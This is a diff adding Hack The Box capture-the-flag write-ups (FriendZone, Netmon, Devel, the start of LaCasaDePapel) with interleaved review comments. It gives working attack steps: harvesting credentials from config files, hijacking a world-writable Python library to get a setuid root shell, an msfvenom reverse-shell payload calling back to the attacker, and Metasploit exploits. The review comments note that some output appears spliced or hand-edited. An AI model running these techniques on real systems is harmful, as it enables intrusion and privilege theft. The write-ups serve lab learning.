+ uname -a
+ Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+
+ www-data@FriendZone:/var/www/admin$ whoami
+ whoami
+ www-data
+
+
+And that's it ! we have been able to login as www-data, now let's see if we have enough permissions to print out the user flag.
+
+
+ www-data@FriendZone:/var/www/admin$ cd /home
+ cd /home
+
+ www-data@FriendZone:/home$ ls
+ ls
+ friend
+
+ www-data@FriendZone:/home$ cd friend
+ cd friend
+ www-data@FriendZone:/home/friend$ ls
+ ls
+ user.txt
+
+ www-data@FriendZone:/home/friend$ cat user.txt
+ cat user.txt
+ a9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now we need to escalate privileges onto the machine. To do so, let's first take a look at the mysql_data.conf file located in /var/www.
+
+
+ www-data@FriendZone:/home/friend$ cd /var/www
+ cd /var/www
+ www-data@FriendZone:/var/www$ ls
+ ls
+ admin
+ friendzone
+ friendzoneportal
+ friendzoneportaladmin
+ html
+ mysql_data.conf
+ uploads
+ www-data@FriendZone:/var/www$ cat mysql_data.conf
+ cat mysql_data.conf
+ for development process this is the mysql creds for user friend
+
+ db_user=friend
+
+ db_pass=Agpyu12!0.213$
+
+ db_name=FZ
+
+
+seems like we have credentials to work with ! friend:Agpyu12!0.213$ let's try to privesc using the su command.
+
+
+ www-data@FriendZone:/var/www$ su friend
+ su friend
+ su: must be run from a terminal
+
+ www-data@FriendZone:/var/www$ which python
+ which python
+ /usr/bin/python
+
+
+That's not a problem, we should be able to fool the system into thinking we are running commands from a TTY session, by using python's pty module.
+
+
+ www-data@FriendZone:/var/www$ python -c 'import pty; pty.spawn("/bin/sh")'
+ python -c 'import pty; pty.spawn("/bin/sh")'
+
+ $ su friend
+ su friend
+ Password: Agpyu12!0.213$
+
+ friend@FriendZone:/var/www$ whoami
+ whoami
+ friend
+
+
+Now let's take a look into the /opt directory. There seems to be an interesting folder for us to look into :
+
+
+ friend@FriendZone:/var/www$ cd /opt
+ cd /opt
+ friend@FriendZone:/opt$ ls
+ ls
+ server_admin
+ friend@FriendZone:/opt$ ls -la
+ ls -la
+ total 12
+ drwxr-xr-x 3 root root 4096 Oct 6 2018 .
+ drwxr-xr-x 22 root root 4096 Oct 5 2018 ..
+ drwxr-xr-x 2 root root 4096 Jan 24 2019 server_admin
+ friend@FriendZone:/opt$ cd server_admin
+ cd server_admin
+ friend@FriendZone:/opt/server_admin$ ls
+ ls
+ reporter.py
+ friend@FriendZone:/opt/server_admin$ cat reporter.py
+ cat reporter.py
+ #!/usr/bin/python
+
+ import os
+
+ to_address = "admin1@friendzone.com"
+ from_address = "admin2@friendzone.com"
+
+ print "[+] Trying to send email to %s"%to_address
+
+ #command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
+
+ #os.system(command)
+
+ # I need to edit the script later
+ # Sam ~ python developer
+ friend@FriendZone:/opt/server_admin$
+
+
+Seems like the python script is importing a library named "os", let's see if we can enumerate it.
+
+
+ friend@FriendZone:/opt/server_admin$ ls -ld /usr/lib/python2.7/os.py
+ ls -ld /usr/lib/python2.7/os.py
+ -rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
+
+
+Whoa ! The os.py libary has got the 777 permissions, This is a serious security flaw as we're about to demonstrate :
+
+
+ friend@FriendZone:/opt/server_admin$ echo "system('chmod 4755 /bin/bash')" >> /usr/lib/python2.7/os.py
+ echo "system('chmod 4755 /bin/bash')" >> /usr/lib/python2.7/os.py
+ friend@FriendZone:/opt/server_admin$ ^[[A^[[A
+ friend@FriendZone:/opt/server_admin$ ls -l /bin/bash
+ -rwxr-xr-x 1 root root 1113504 Apr 4 2018 /bin/bash
+
+
+Wait a little while for the cronjob to execute the python script, and you should see the permissions of /bin/bash changing.
+
+
+ friend@FriendZone:/opt/server_admin$ ^[[A
+ ls -l /bin/bash
+ -rwsr-xr-x 1 root root 1113504 Apr 4 2018 /bin/bash
+ friend@FriendZone:/opt/server_admin$ /bin/bash -p
+ /bin/bash -p
+ bash-4.4# whoami
+ whoami
+ root
+ bash-4.4# cat /root/root.txt
+ cat /root/root.txt
+ b0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
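Review bot: several terminal listings in this hunk have been corrupted by markdown processing and should be fenced as ```text blocks with the artifacts removed: the nbtstat table and the nmap smb-enum-shares output show `<****00>`, `<****ACTIVE>` and `<****unknown>` where the tools print `<00>`, `<ACTIVE>` and `<unknown>`; the enum4linux output has a stray `**` that fuses `line 890.` with the `=====` banner of the share enumeration section; the PHP one-liner opens with `<****?php` instead of `<?php`; and the line after the port-80 paragraph is a leftover `&nbsp;`. Three content points: the `pacman -S blackarch/python2-dnsknife` line is unrelated to the `dig axfr` command that follows and should be dropped or explained; the root section tells the reader to wait for the cron job that runs reporter.py, but nothing in the hunk shows how it was established that a root-owned scheduled job executes that script, so the listing that was used to confirm it (crontab or equivalent) should be included so the reader can verify the reasoning; and "fool the system into thinking we are running commands from a TTY" is inaccurate, since `pty.spawn` allocates a real pseudo-terminal and `su` then has a genuine tty. Typo: "Febuary" in the introduction should read "February".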
diff --git a/Easy/29.md b/Easy/29.md
new file mode 100644
index 0000000..5d75fbc
--- /dev/null
+++ b/Easy/29.md
@@ -0,0 +1,267 @@
+# Netmon Writeup
+
+
+
+## Introduction :
+
+Netmon is an easy Windows box that was released back in March 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -F 10.10.10.152 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 08:36 CET
+ Nmap scan report for 10.10.10.152
+ Host is up (0.037s latency).
+ Not shown: 8313 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 80/tcp open http
+ 135/tcp open msrpc
+ 139/tcp open netbios-ssn
+ 445/tcp open microsoft-ds
+ 5985/tcp open wsman
+ 47001/tcp open winrm
+
+ Nmap done: 1 IP address (1 host up) scanned in 6.13 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -sCV -p21,80,135,139,445,5985,47001 10.10.10.152
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 08:36 CET
+ Nmap scan report for 10.10.10.152
+ Host is up (0.035s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ | 02-02-19 11:18PM 1024 .rnd
+ | 02-25-19 09:15PM <****DIR> inetpub
+ | 07-16-16 08:18AM <****DIR> PerfLogs
+ | 02-25-19 09:56PM <****DIR> Program Files
+ | 02-02-19 11:28PM <****DIR> Program Files (x86)
+ | 02-03-19 07:08AM <****DIR> Users
+ |_02-25-19 10:49PM <****DIR> Windows
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
+ |_http-server-header: PRTG/18.1.37.13946
+ | http-title: Welcome | PRTG Network Monitor (NETMON)
+ |_Requested resource was /index.htm
+ |_http-trane-info: Problem with XML parsing of /evox/about
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
+ 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-server-header: Microsoft-HTTPAPI/2.0
+ |_http-title: Not Found
+ 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-server-header: Microsoft-HTTPAPI/2.0
+ |_http-title: Not Found
+ Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 31s, deviation: 0s, median: 30s
+ |_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
+ | smb-security-mode:
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2019-12-09T07:37:33
+ |_ start_date: 2019-12-09T07:33:41
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 20.27 seconds
+
+## **Part 2 : Getting User Access**
+
+Looking at the results, we see that ftp allows us to login as the user account , so we login using the default credentials (anonymous:anonymous:)
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → ftp 10.10.10.152
+ Connected to 10.10.10.152.
+ 220 Microsoft FTP Service
+ Name (10.10.10.152:nihilist): anonymous
+ 331 Anonymous access allowed, send identity (e-mail name) as password.
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-02-19 11:18PM 1024 .rnd
+ 02-25-19 09:15PM <****DIR> inetpub
+ 07-16-16 08:18AM <****DIR> PerfLogs
+ 02-25-19 09:56PM <****DIR> Program Files
+ 02-02-19 11:28PM <****DIR> Program Files (x86)
+ 02-03-19 07:08AM <****DIR> Users
+ 02-25-19 10:49PM <****DIR> Windows
+ 226 Transfer complete.
+ ftp> cd Users
+ 250 CWD command successful.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-25-19 10:44PM <****DIR> Administrator
+ 02-02-19 11:35PM <****DIR> Public
+ 226 Transfer complete.
+ ftp> cd Public
+ 250 CWD command successful.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-03-19 07:05AM <****DIR> Documents
+ 07-16-16 08:18AM <****DIR> Downloads
+ 07-16-16 08:18AM <****DIR> Music
+ 07-16-16 08:18AM <****DIR> Pictures
+ 02-02-19 11:35PM 33 user.txt
+ 07-16-16 08:18AM <****DIR> Videos
+ 226 Transfer complete.
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 1 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 33 bytes received in 0.0344 seconds (958 bytes/s)
+ ftp> quit
+ 221 Goodbye.
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → cat user.txt
+ ddXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have the user flag.
+
+## **Part 3 : Getting Root Access**
+
+In order to find the root flag, we need to enumerate a little bit what lies inside the /ProgramData folder.
+
+
+ ftp> cd /ProgramData
+ 250 CWD command successful.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-02-19 11:15PM <****DIR> Licenses
+ 11-20-16 09:36PM <****DIR> Microsoft
+ 02-02-19 11:18PM <****DIR> Paessler
+ 02-03-19 07:05AM <****DIR> regid.1991-06.com.microsoft
+ 07-16-16 08:18AM <****DIR> SoftwareDistribution
+ 02-02-19 11:15PM <****DIR> TEMP
+ 11-20-16 09:19PM <****DIR> USOPrivate
+ 11-20-16 09:19PM <****DIR> USOShared
+ 02-25-19 09:56PM <****DIR> VMware
+ 226 Transfer complete.
+ ftp> cd Paessler
+ 250 CWD command successful.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 12-09-19 02:35AM <****DIR> PRTG Network Monitor
+ 226 Transfer complete.
+
+Interesting ! seems like there is a PRTG Service running, let's see if we can get anything out of it.
+
+
+ ftp> cd "PRTG Network Monitor"
+ 250 CWD command successful.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-02-19 11:40PM <****DIR> Configuration Auto-Backups
+ 12-09-19 02:34AM <****DIR> Log Database
+ 02-02-19 11:18PM <****DIR> Logs (Debug)
+ 02-02-19 11:18PM <****DIR> Logs (Sensors)
+ 02-02-19 11:18PM <****DIR> Logs (System)
+ 12-09-19 02:34AM <****DIR> Logs (Web Server)
+ 02-25-19 07:01PM <****DIR> Monitoring Database
+ 02-25-19 09:54PM 1189697 PRTG Configuration.dat
+ 02-25-19 09:54PM 1189697 PRTG Configuration.old
+ 07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
+ 12-09-19 02:35AM 1647616 PRTG Graph Data Cache.dat
+ 02-25-19 10:00PM <****DIR> Report PDFs
+ 02-02-19 11:18PM <****DIR> System Information Database
+ 02-02-19 11:40PM <****DIR> Ticket Database
+ 02-02-19 11:18PM <****DIR> ToDo Database
+ 226 Transfer complete.
+ ftp>
+
+Looks like we have a few configuration files to work with, let's save the "PRTG Configuration.old.bak" one locally and see if we can get anything out of it.
+
+
+ ftp> get "PRTG Configuration.old.bak'
+ 200 PORT command successful.
+ 550 The system cannot find the file specified.
+ ftp> get "PRTG Configuration.old.bak"
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 226 Transfer complete.
+ 1153755 bytes received in 0.516 seconds (2.13 Mbytes/s)
+ ftp> quit
+ 221 Goodbye.
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
+ →nano PRTG\ Configuration.old.bak
+
+
+
+ <****dbpassword> <****!-- User: prtgadmin -->
+ PrTg@dmin2018 <****/dbpassword>
+
+And we have unencrypted credentials ! Let's see if we can use them somewhere.
+
+
+
+Of course these are the old credentials, so let's update the password to : **PrTg@dmin2019**
+
+
+
+And we are logged in ! now let's navigate to the Notifications page, into the "Executing Program" tab, where the command injection vulnerability is located.
+
+
+
+Once the infected notification is created, execute it and check out the ftp C:/Users/Public directory once again.
+
+
+
+
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 02-03-19 07:05AM <****DIR> Documents
+ 07-16-16 08:18AM <****DIR> Downloads
+ 07-16-16 08:18AM <****DIR> Music
+ 07-16-16 08:18AM <****DIR> Pictures
+ 02-02-19 11:35PM 33 user.txt
+ 02-02-19 11:35PM 33 nihilist.txt
+ 07-16-16 08:18AM <****DIR> Videos
+ 226 Transfer complete.
+ ftp> get nihilist.txt
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 1 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 33 bytes received in 0.0438 seconds (754 bytes/s)
+ ftp> quit
+ 221 Goodbye.
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
+ → cat nihilist.txt
+ 30XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
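Review bot: the Part 2 sentence "ftp allows us to login as the user account , so we login using the default credentials (anonymous:anonymous:)" is garbled; the scan above it says `ftp-anon: Anonymous FTP login allowed`, so say that anonymous login is allowed and give the credentials once, without the stray space and trailing colon. Throughout the hunk the FTP listings show `<****DIR>` and the config excerpt shows `<****dbpassword>` / `<****/dbpassword>`, which is mangled markup where the server prints `<DIR>` and the file contains `<dbpassword>`; escape the angle brackets instead. In the final listing, `nihilist.txt` carries the same `02-02-19 11:35PM` timestamp and 33-byte size as `user.txt` even though it was created during this 12-09-19 session, so that block looks hand-edited rather than captured; paste the real output. The Part 3 steps between the credential excerpt and that listing ("update the password", "navigate to the Notifications page", "Once the infected notification is created") each rely on a screenshot that is not in this patch, so the text alone does not document what was configured or why the file appears in `C:/Users/Public`. Finally, the Part 1 intro says `-sC`/`-sV` while the commands actually run `-F ... --top-ports 10000` and then `-sCV`; align the text with the commands, and the Conclusion's progress graph image is also missing.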
diff --git a/Easy/3.md b/Easy/3.md
new file mode 100644
index 0000000..cfe0ae3
--- /dev/null
+++ b/Easy/3.md
@@ -0,0 +1,241 @@
+# Devel Writeup
+
+
+
+## Introduction :
+
+Devel was an easy Windows box released back in March 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ **λ nihilist [~] → nmap -sC -sV 10.10.10.5**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 11:42 CET
+ Nmap scan report for 10.10.10.5
+ Host is up (0.039s latency).
+ Not shown: 998 filtered ports
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ | 03-18-17 01:06AM <****DIR> aspnet_client
+ | 03-17-17 04:37PM 689 iisstart.htm
+ |_03-17-17 04:37PM 184946 welcome.png
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 80/tcp open http Microsoft IIS httpd 7.5
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/7.5
+ |_http-title: IIS7
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds
+
+We see that port 21 is opened, and giving us a ftp service that allows anonymous connections to work with.
+
+## **Part 2 : Getting User Access**
+
+The first step is to check if we can download and upload files on the FTP service since it should allow us to be connected as an anonymous user.
+
+
+ **λ nihilist [~] → ftp 10.10.10.5**
+ Connected to 10.10.10.5.
+ 220 Microsoft FTP Service
+ Name (10.10.10.5:nihilist): anonymous
+ 331 Anonymous access allowed, send identity (e-mail name) as password.
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+
+ **ftp> dir**
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 03-18-17 01:06AM **IR> aspnet_client
+ 03-17-17 04:37PM 689 iisstart.htm
+ 03-17-17 04:37PM 184946 welcome.png
+ 226 Transfer complete.
+
+
+Now let's see if we can download files and upload files.
+
+
+ **ftp> dir**
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 03-18-17 01:06AM **R> aspnet_client
+ 03-17-17 04:37PM 689 iisstart.htm
+ 03-17-17 04:37PM 184946 welcome.png
+ 226 Transfer complete.
+
+ **ftp> get welcome.png**
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 820 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 184946 bytes received in 0.285 seconds (634 kbytes/s)
+
+ **ftp> put nihilist.html**
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 226 Transfer complete.
+ 16 bytes sent in 0.000144 seconds (109 kbytes/s)
+
+
+We have been able to download welcome.png, and upload nihilist.html, let's see if we can browse to our uploaded webpage.
+
+
+
+As shown above, we have successfully uploaded our webpage, and browsed to it. now let's try to upload a reverse shell and browse to it. To generate the payload named nihilist.aspx, we will be using msfvenom with the -p, LHOST, LPORT and -f flags. We will be using our terminal with the according metasploit module to recieve the meterpreter connection.
+
+_Terminal n°1:_
+
+
+ **λ nihilist [~/_HTB/Devel] → msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=9001 -f aspx > nihilist.aspx**
+ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+ [-] No arch selected, selecting arch: x86 from the payload
+ No encoder or badchars specified, outputting raw payload
+ Payload size: 341 bytes
+ Final size of aspx file: 2824 bytes
+
+ **λ nihilist [~/_HTB/Devel] → msfconsole**
+
+ **msf5 > use exploit/multi/handler**
+
+ **msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp**
+ payload => windows/meterpreter/reverse_tcp
+
+ **msf5 exploit(multi/handler) > set LHOST 10.10.14.48**
+ LHOST => 10.10.14.48
+
+ **msf5 exploit(multi/handler) > set LPORT 9001**
+ LPORT => 9001
+
+ **msf5 exploit(multi/handler) > show options**
+
+ Module options (exploit/multi/handler):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+
+
+ Payload options (windows/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
+ LHOST 10.10.14.48 yes The listen address (an interface may be specified)
+ LPORT 9001 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Wildcard Target
+
+
+
+our first terminal is ready to recieve the connection, now we will upload the nihilist.aspx payload, and browse to it, and we'll see if we can get our meterpreter shell.
+
+_Terminal n°2:_
+
+
+ **λ nihilist [~/_HTB/Devel] → ftp 10.10.10.5**
+
+ Connected to 10.10.10.5.
+ 220 Microsoft FTP Service
+ Name (10.10.10.5:nihilist): anonymous
+ 331 Anonymous access allowed, send identity (e-mail name) as password.
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+
+ **ftp> put nihilist.aspx**
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 226 Transfer complete.
+ 2860 bytes sent in 0.000315 seconds (8.66 Mbytes/s)
+ ftp>
+
+
+
+ _Terminal n°1:_
+
+
+ **msf5 exploit(multi/handler) > exploit**
+
+ [*] Started reverse TCP handler on 10.10.14.48:9001
+ [*] Sending stage (180291 bytes) to 10.10.10.5
+ [*] Meterpreter session 1 opened (10.10.14.48:9001 -> 10.10.10.5:49158) at 2019-11-10 13:55:18 +0100
+
+ **meterpreter > getuid**
+ Server username: IIS APPPOOL\Web
+
+ **meterpreter > background**
+ [*] Backgrounding session 1...
+
+
+
+We recieved our meterpreter session back, now we need to escalate privileges. First of all we background our meterpreter session, so that we can use the ms10_015 exploit named kitrap0d
+
+
+ **meterpreter > background**
+ [*] Backgrounding session 1...
+ **msf5 exploit(multi/handler) >**
+
+ **msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d**
+
+ **msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1**
+ session => 1
+
+ **msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.48**
+ lhost => 10.10.14.48
+
+ **msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 9002**
+ lport => 9002
+
+ **msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit**
+
+ [*] Started reverse TCP handler on 192.168.0.23:9002
+ [*] Launching notepad to host the exploit...
+ [+] Process 3372 launched.
+ [*] Reflectively injecting the exploit DLL into 3372...
+ [*] Injecting exploit into 3372 ...
+ [*] Exploit injected. Injecting payload into 3372...
+ [*] Payload injected. Executing exploit...
+ [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+ [*] Sending stage (179779 bytes) to 10.10.10.5
+ [*] Meterpreter session 2 opened (10.10.14.48:9002 -> 10.10.10.5:49159) at 2019-11-10 14:04:56 -0500
+
+ **meterpreter > getuid**
+ Server username: NT AUTHORITY\SYSTEM
+
+
+Our exploit worked! It returned with an elevated privileges shell. Now all that is left to do is grabbing the user and root flags.
+
+## **Part 3 : The Root Access**
+
+The user flag is located in C:\User\babis\Desktop The root flag is located in C:\Users\Administrator\Desktop
+
+
+ c:\Users\babis\Desktop>type user.txt
+ type user.txt
+ **XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+
+ c:\Users\Administrator\Desktop>type root.txt
+ type root.txt
+ **XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+
+
+And that's it ! we grabbed both the user and root flags.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
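Review bot: two pieces of output in this hunk do not match the commands above them: after `set lhost 10.10.14.48` the kitrap0d run prints `Started reverse TCP handler on 192.168.0.23:9002`, and the second session's timestamp is `-0500` while the first is `+0100`, so the privilege-escalation transcript appears spliced from a different run; recapture it or say so in the text. The `dir` listings show `**IR> aspnet_client` / `**R> aspnet_client` where the server printed `<DIR>`, the bold markers having swallowed the tag; escape the angle brackets. In Part 3, `C:\User\babis\Desktop` should be `C:\Users\babis\Desktop` (the prompt below it shows `c:\Users\babis\Desktop`), and "recieve"/"recieved" appear three times for "receive"/"received". The first `ftp> dir` block is also pasted twice, and the screenshots referenced by "As shown above" and by the Conclusion's progress graph are not part of the patch.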
diff --git a/Easy/30.md b/Easy/30.md
new file mode 100644
index 0000000..4b21324
--- /dev/null
+++ b/Easy/30.md
@@ -0,0 +1,528 @@
+# LaCasaDePapel Writeup
+
+
+
+## Introduction :
+
+LaCasaDePapel is an easy Linux box released back in March 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
+ → ping 10.10.10.131
+ PING 10.10.10.131 (10.10.10.131) 56(84) bytes of data.
+ 64 bytes from 10.10.10.131: icmp_seq=1 ttl=63 time=37.7 ms
+ 64 bytes from 10.10.10.131: icmp_seq=2 ttl=63 time=140 ms
+ 64 bytes from 10.10.10.131: icmp_seq=3 ttl=63 time=248 ms
+ ^C
+ --- 10.10.10.131 ping statistics ---
+ 3 packets transmitted, 3 received, 0% packet loss, time 2003ms
+ rtt min/avg/max/mdev = 37.737/141.928/247.866/85.793 ms
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
+ → nmap -F 10.10.10.131
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 10:36 CET
+ Nmap scan report for 10.10.10.131
+ Host is up (0.34s latency).
+ Not shown: 96 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 80/tcp open http
+ 443/tcp open https
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.37 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
+ → nmap -sCV -p21,22,80,443 10.10.10.131
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 10:36 CET
+ Nmap scan report for 10.10.10.131
+ Host is up (0.19s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 2.3.4
+ 22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
+ | 256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
+ |_ 256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
+ 80/tcp open http Node.js (Express middleware)
+ |_http-title: La Casa De Papel
+ 443/tcp open ssl/http Node.js Express framework
+ | http-auth:
+ | HTTP/1.1 401 Unauthorized\x0D
+ |_ Server returned status 401 but no WWW-Authenticate header.
+ | ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
+ | Not valid before: 2019-01-27T08:35:30
+ |_Not valid after: 2029-01-24T08:35:30
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+ | tls-nextprotoneg:
+ | http/1.1
+ |_ http/1.0
+ Service Info: OS: Unix
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 30.73 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up vsftpd 2.3.4 running on port 21, Let's run a quick searchsploit command to see if there are any popular exploits for us to use.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → searchsploit vsftpd 2.3
+ ---------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ---------------- ----------------------------------------
+ vsftpd 2.3.2 - | exploits/linux/dos/16270.c
+ vsftpd 2.3.4 - | exploits/unix/remote/17491.rb
+ ---------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+
+Seems like there is a .rb script for us to use, which is most probably available for us within metasploit. Let's fire up msfconsole to see if we're correct.
+
+
+ msf5 > search vsftpd 2.3.4
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
+ 1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
+ 2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
+ 3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
+
+
+
+The third one seems to be interesting , let's use it.
+
+
+ msf5 > use 3
+ msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
+
+ Module options (exploit/unix/ftp/vsftpd_234_backdoor):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 21 yes The target port (TCP)
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+
+ msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.131
+ RHOSTS => 10.10.10.131
+ msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
+
+
+The only option that needs to be set is the RHOSTS one, we then hit exploit and see what results we're getting :
+
+
+ msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
+
